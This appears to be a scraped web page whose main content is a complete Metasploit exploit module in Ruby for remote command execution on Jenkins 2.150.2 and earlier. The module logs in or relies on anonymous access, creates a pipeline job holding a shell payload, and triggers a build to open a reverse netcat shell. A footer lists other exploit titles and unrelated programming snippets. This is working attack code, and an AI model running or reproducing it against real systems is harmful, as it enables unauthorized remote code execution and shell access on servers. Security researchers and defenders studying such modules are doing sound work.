##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})

        super(update_info(info,

          'Name'           => 'Jenkins <= 2.150.2 Remote Command Execution via Node JS (Metasploit)',

          'Description'    => %q{

                  This module can run commands on the system using Jenkins users who has JOB creation and BUILD privileges.

                  The vulnerability is exploited by a small script prepared in NodeJS.

                  The sh parameter allows us to run commands.

                  Sample script:

                                node {

                                      sh "whoami"

                                }

                  In addition, ANONYMOUS users also have the authority to JOB create and BUILD by default.

                  Therefore, all users without console authority can run commands on the system as root privilege.

          },

          'Author'         => [

            'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module

          ],

          'License'        => MSF_LICENSE,

          'References'     =>

            [

              ['URL', 'https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html']

            ],

          'Privileged'     => true,

          'Payload'        =>

            {

              'DisableNops' => true,

              'Space'       => 512,

              'Compat'      =>

                {

                  'PayloadType' => 'cmd',

                  'RequiredCmd' => 'reverse netcat generic perl ruby python telnet',

                }

            },

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Targets'        => [[ 'Jenkins <= 2.150.2', { }]],

          'DisclosureDate' => 'Feb 11 2019',

          'DefaultTarget'  => 0,

          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }))

          register_options(

            [

                OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),

                OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),

                OptString.new('PATH', [ true, 'The path to jenkins', '/' ]),

            ], self.class)

    end

##

# Jenkins activity check

##

    def check

        res = send_request_cgi({'uri' => "/login"})

        if res and res.headers.include?('X-Jenkins')

            return Exploit::CheckCode::Detected

        else

            return Exploit::CheckCode::Safe

        end

    end

    def exploit

        print_status('Attempting to login to Jenkins dashboard')

        res = send_request_cgi({'uri' => "/script"})

        if not (res and res.code)

            fail_with(Exploit::Failure::Unknown)

        end

        sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]

        @cookie = "#{sessionid}"

    print_status("#{sessionid}")

        if res.code != 200

            print_status('Logging in...')

##

# Access control and information

##

            res = send_request_cgi({

                'method'    => 'POST',

                'uri'       => "/j_acegi_security_check",

                'cookie'    => @cookie,

                'vars_post' =>

                    {

                        'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),

                        'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),

                        'Submit'     => 'Sign+in'

                    }

            })

            if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/

                print_error('User Login failed. If anonymous login is active, exploit will continue.')

            end

        else

            print_status('No authentication required, skipping login...')

        end

##

# Check Crumb for create pipeline

##

    cookies = res.get_cookies

        res = send_request_cgi({

        'method' => 'GET',

            'uri' => "/view/all/newJob",

            'cookie'  => cookies

        })

        html = res.body

        if html =~ /Jenkins-Crumb/

          print_good("Login Successful")

        else

          print_status("Service found, but login failed")

          exit 0

        end

    crumb = res.body.split('Jenkins-Crumb')[1].split('");<')[0].split('"').last

        print_status("Jenkins-Crumb: #{crumb}")

##

# Create Pipeline

##

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/view/all/createItem",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'name' => "cmd",

                    'mode' => "org.jenkinsci.plugins.workflow.job.WorkflowJob",

                    'from' => "",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "%7B%22name%22%3A+%22cmd%22%2C+%22mode%22%3A+%22org.jenkinsci.plugins.workflow.job.WorkflowJob%22%2C+%22from%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%22528f90f71b2d2742299b4daf503130ac%22%7"

                }

        })

##

# Configure Pipeline

##

        shell = payload.encoded

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/configSubmit",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'description' => "cmd",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "{\"description\": \"cmd\", \"properties\": {\"stapler-class-bag\": \"true\", \"hudson-security-AuthorizationMatrixProperty\": {}, \"jenkins-model-BuildDiscarderProperty\": {\"specified\": false, \"\": \"0\", \"strategy\": {\"daysToKeepStr\": \"\", \"numToKeepStr\": \"\", \"artifactDaysToKeepStr\": \"\", \"artifactNumToKeepStr\": \"\", \"stapler-class\": \"hudson.tasks.LogRotator\", \"$class\": \"hudson.tasks.LogRotator\"}}, \"org-jenkinsci-plugins-workflow-job-properties-DisableConcurrentBuildsJobProperty\": {\"specified\": false}, \"org-jenkinsci-plugins-workflow-job-properties-DisableResumeJobProperty\": {\"specified\": false}, \"com-coravy-hudson-plugins-github-GithubProjectProperty\": {}, \"org-jenkinsci-plugins-workflow-job-properties-DurabilityHintJobProperty\": {\"specified\": false, \"hint\": \"MAX_SURVIVABILITY\"}, \"org-jenkinsci-plugins-pipeline-modeldefinition-properties-PreserveStashesJobProperty\": {\"specified\": false, \"buildCount\": \"1\"}, \"hudson-model-ParametersDefinitionProperty\": {\"specified\": false}, \"jenkins-branch-RateLimitBranchProperty$JobPropertyImpl\": {}, \"org-jenkinsci-plugins-workflow-job-properties-PipelineTriggersJobProperty\": {\"triggers\": {\"stapler-class-bag\": \"true\"}}}, \"disable\": false, \"hasCustomQuietPeriod\": false, \"quiet_period\": \"5\", \"displayNameOrNull\": \"\", \"\": \"0\", \"definition\": {\"script\": \"node {\\n    sh \\\"#{shell}\\\"\\n}\", \"\": [\"try sample Pipeline...\", \"\\u0001\\u0001\"], \"sandbox\": true, \"stapler-class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\", \"$class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\"}, \"core:apply\": \"\", \"Jenkins-Crumb\": \"#{crumb}\"}",

                    'Submit' => "Save"

                }

        })

        if res.code == 302

          print_good("Pipeline was created and Node JS code was integrated.")

        end

##

# Build Pipeline and Execute payload

##

        print_status("Trying to get remote shell...")

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/build?delay=0sec",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'Jenkins-Crumb' => "#{crumb}"

                }

        })

    handler

    end

end

##

# End

##

[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  6. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  7. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  8. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  9. struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

随机推荐

  1. 在ASP.NET MVC中使用Area区域

    在大型的ASP.NET mvc5项目中一般都有许多个功能模块,这些功能模块可以用Area(中文翻译为区域)把它们分离开来,比如:Admin,Customer,Bill.ASP.NET MVC项目中把各 ...

  2. 浏览器useragent

    var ua = window.navigator.userAgent; edge :Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537 ...

  3. Springboot学习04-默认错误页面加载机制源码分析

    Springboot学习04-默认错误页面加载机制源码分析 前沿 希望通过本文的学习,对错误页面的加载机制有这更神的理解 正文 1-Springboot错误页面展示 2-Springboot默认错误处 ...

  4. 【网络编程】服务端产生大量的close_wait状态的进程分析

    首先要明白close_wait状态是在tcp通信四次握手时的一个中间状态: 即当被动关闭方发送完ACK后进入的状态.这个状态的结束,即要达到下一个状态LASK_ACK需要在发无端发送完剩余的数据后(s ...

  5. 加NONCLUSTERED INDEX索引,在ON了之后还要INCLUDE

    之前加了索引,但效果不大 SET STATISTICS TIME ON --执行时间 SET STATISTICS IO ON --IO读取 DBCC DROPCLEANBUFFERS --清除缓冲区 ...

  6. node.js中express的Router路由的使用

    express中的Router作用就是为了方便我们更好的根据路由去分模块.避免将所有路由都写在入口文件中. 一.简单的使用Router const express = require('express ...

  7. Django contenttypes 应用

    Django contenttypes 应用 什么是Django ContentTypes? Django ContentTypes是由Django框架提供的一个核心功能,它对当前项目中所有基于Dja ...

  8. vnc 搭建 转

    这里要注意,关闭selinux setenforce 0 原文地址: http://www.linuxidc.com/Linux/2015-04/116725.htm 这是一个关于怎样在你的 Cent ...

  9. 简单利用jQuery,让前端开发不再依赖于后端的接口

    前端开发的过程中,我们免不了和后端进行联调,这时候就会出现以下的尴尬场景: 接口没写好,没法做接下来的功能 功能写好了,接口没写好,没法测这个功能 联调了,出了BUG,不知道锅在谁身上,只得陪后端耗时 ...

  10. javascript常见内存泄露

    一.全局变量引起的内存泄漏 function func(){ lmw = 123456 //lmw是全局变量,不会被释放 } 二.闭包引起的内存泄漏 function func(){ var lmw ...